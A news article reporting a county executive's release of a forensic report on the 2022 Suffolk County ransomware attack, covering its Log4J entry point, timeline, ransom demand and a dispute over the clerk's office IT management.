Steve Bellone: Suffolk cyberattack began in December 2021
A cyberattack on Suffolk County computer systems started in the clerk's office as early as December 2021, months earlier than previously disclosed, allowing hackers to launch a systemwide attack by Sept. 8, according to a county report released Wednesday.
The hackers took advantage of a security flaw that is common in computer systems — known as a "a Log4J vulnerability" — to make their way into Suffolk's vast network and cripple key functions within one of the nation's largest municipalities.
At a news conference Wednesday, County Executive Steve Bellone also revealed that hackers demanded a $2.5 million ransom.
Bellone said the county did not pay, fearing the money would be used to commit crimes.
WHAT TO KNOW
- A cyberattack on Suffolk County systems started in the Clerk's Office as early as December 2021, months earlier than previously disclosed, Suffolk County Executive Steve Bellone said Wednesday in releasing a new forensic report.
- Bellone revealed that hackers demanded a $2.5 million ransom, which the county did not pay.
- The report provided new information about techniques the hackers used, including sophisticated "credential harvesting" and bitcoin mining tactics to creep into Suffolk computer systems.
County officials have said the hack came from the BlackCat, or ALPHV strain of ransomware.
Bellone released a summary of a report by digital forensic auditor Palo Alto Networks Inc., which the county attorney's office hired to analyze the ransomware attack.
The report provided a timeline of the spread of the hack from the clerk's office in December 2021 to county networks in August and September.
The last departments hacked were the health and sheriff's departments, also in September, the report said.
The report provided new information about the techniques hackers used, including sophisticated "credential harvesting" and bitcoin mining tactics to creep into Suffolk computer systems until they had secured full access.
The hackers acquired the necessary IT credentials of top administrators in the clerk's office before moving to the county's IT department in late August, Bellone said.
The Palo Alto Networks report said hackers tried using, "discovery, enumeration, and privilege escalation tactics, techniques, and procedures and moved laterally through systems in the Suffolk County networks."
"The key finding of this forensic examination thus far is that the criminal actors first infiltrated the county clerk's IT environment one year ago this month," Bellone said.
"The criminal actors here sought a $2.5 million ransom," Bellone said.
Bellone said he decided "early on in this process" not to pay ransom.
"Payment is no guarantee that the criminal actors will honor their commitment or they won't come back later to extract additional demands," he said.
Officials shut down all county computer and email systems beginning Sept. 8 in an effort to contain the attack.
The shutdown caused delays in payments to county nonprofits and other vendors, and complicated title searches needed for closing on real estate transactions.
Suffolk has spent $3.4 million to restore and $2 million on the forensic investigation, Bellone said.
Restoration of Suffolk's network has taken an unusually long time, experts have told Newsday, although most county sites are back in operation, officials said.
Forensic analysts said hackers gained access to county networks in the clerk's office, exploiting "a Log4J vulnerability" on Dec. 19, and Dec. 20."
In January, the U.S. Federal Trade Commission said:
"Recently, a serious vulnerability in the popular Java logging package, Log4j was disclosed, posing a severe risk to millions … This vulnerability is being widely exploited by a growing set of attackers"
Hackers installed "cryptocurrency mining software on multiple" servers in the Suffolk clerk's office in January, the Palo Alto report said.
In March, hackers "continued to bypass network security and install remote monitoring and management tools as they began harvesting" user credentials of officials in the clerk's office.
Bellone criticized the clerk's office for its response to the attack.
He said Judith A. Pascale, a Republican, should not have trusted her office's IT director, who he said "seriously misled her."
Bellone said the individual acted in an "incredibly nonchalant manner."
She trusted someone who in the end was not deserving of that trust," Bellone said. The clerk's IT department for many years has operated independently of the county's IT department.
County IT officials "had no eyes on, and no ability to monitor the clerk IT environment," he said.
Bellone, a Democrat, said Wednesday he had placed the clerk's IT director on administrative leave.
Bellone did not identify the IT chief, but Pascale and a county official confirmed the official placed on leave was Peter Schlussler.
Schlussler defended his performance in an email to Newsday.
"No one is perfect with decision making in the highly complex technological world. I included … ," Schlussler wrote.
"I do know I did my absolute best by trying to bring awareness to the cyber issues that me and my team witnessed over the course of the year," Schlussler said.
"Our office attempted to purchase a more robust firewall in June to offer better protection, however that was not allowed to be pushed forward," he said.
Schlussler said, "retribution was to be expected and I stand by what is depicted clearly in the emails."
Documents obtained by Newsday have revealed a continuing conflict between Pascale’s office and the county Information Technology Department as clerk’s officials sought what they said was more advanced protection for their computer systems.
Pascale’s office said it wanted a more expensive hardware solution for the firewall to identify and ward off cyberattacks before they could enter county networks, emails obtained by Newsday show.
The county government's solution was a "virtualized" firewall, which it said would provide the same level of protection while saving taxpayers money.
Pascale declined to comment on Bellone's remarks Wednesday.
Bellone said discovery of an unauthorized bitcoin operation in September 2021 may have led to delays in implementing a $1.4 million security upgrade in the clerk's office, approved by the county in September 2019.
Last year, Suffolk police charged IT supervisor Christopher Naples, of Mattituck, with third-degree grand larceny, public corruption, computer trespassing and official misconduct for allegedly running a cryptocurrency mining operation out of the county clerk’s Riverhead office.
Naples has pleaded not guilty. The case is pending in Southampton Town Court.
"The most obvious explanation, if you're Chris Naples, the architect of the first IT environment, running an illegal bitcoin mining operation, you're not going to want outside vendors and internal IT folks moving things around, in that environment," Bellone said.
A spokeswoman for Suffolk County District Attorney Ray Tierney said the office was working with the FBI on the criminal investigation into the cyberattack, but would not comment on pending charges.
With Mark Harrington
TIMELINE
Dec. 19 — Dec. 20, 2021: Hackers gain access to the County Clerk's Office by leveraging a coding vulnerability known as Log4J.
January 2022: Hackers install bitcoin mining software in clerk office servers to establish a "command and control connection" within the clerk's "compromised IT environment," Bellone said.
March: Hackers install remote monitoring and management tools and harvest credentials of officials in the clerk's office.
Aug. 18: Hackers attempt to identify members of a highly privileged administrators group in county government.
Aug. 20-21: County systems are compromised via malware run from the clerk's office. Hackers begin harvesting the credentials of county administrators.
Sept. 8: County announces hack into computer networks: All websites, servers, networks taken offline.
Source: Suffolk County Executive
'Ridiculous tickets that are illogical' A Newsday investigation shows that about 70% of tickets issued by Suffolk County for school bus camera violations in 2023 took place on roads that students don't cross. NewsdayTV's Virginia Huie reports.
'Ridiculous tickets that are illogical' A Newsday investigation shows that about 70% of tickets issued by Suffolk County for school bus camera violations in 2023 took place on roads that students don't cross. NewsdayTV's Virginia Huie reports.